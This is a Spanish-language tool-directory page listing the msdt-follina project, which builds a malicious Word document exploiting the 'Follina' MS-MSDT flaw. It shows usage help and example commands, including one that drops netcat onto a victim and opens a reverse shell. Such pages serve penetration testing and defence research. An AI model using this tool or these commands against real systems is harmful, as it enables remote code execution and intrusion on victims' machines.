Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
msdt-follina — Genera un documento malicioso de Microsoft Word que explota la vulnerabilidad MS-MSDT 'Follina' para ejecutar comandos arbitrarios o alojar payloads a través de un servidor HTTP. | Kitploit
Herramientas/GitHubGitHub/johnhammond/msdt-follina
ExplotaciónExplotación de Aplicaciones WebPhishingComando y ControlDesarrollo de Payloads
GitHubjohnhammond/msdt-follina

msdt-follina

Genera un documento malicioso de Microsoft Word que explota la vulnerabilidad MS-MSDT 'Follina' para ejecutar comandos arbitrarios o alojar payloads a través de un servidor HTTP.

Ver Repositorio
1.6k37010hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vector de Ataque MS-MSDT "Follina"

John Hammond | 30 de mayo de 2022


Crea un ataque MS-MSDT "Follina" con un documento malicioso de Microsoft Word y aloja un payload con un servidor HTTP.

Screenshot

Uso

root@kitploit:~
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND, -c COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT, -o OUTPUT
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE, -i INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT, -p PORT  port to serve the HTTP server (default: 8000)

Ejemplos

Abre calc.exe:

root@kitploit:~
$ python3 follina.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000

Abre notepad.exe:

root@kitploit:~
$ python3 follina.py -c "notepad"

Obtén una reverse shell en el puerto 9001. Nota: esto descarga un binario de netcat en la víctima y lo coloca en C:\Windows\Tasks. No limpia el binario. Esto activará las detecciones del antivirus a menos que el AV esté deshabilitado.

root@kitploit:~
$ python3 follina.py -r 9001

Reverse Shell

Descargar herramienta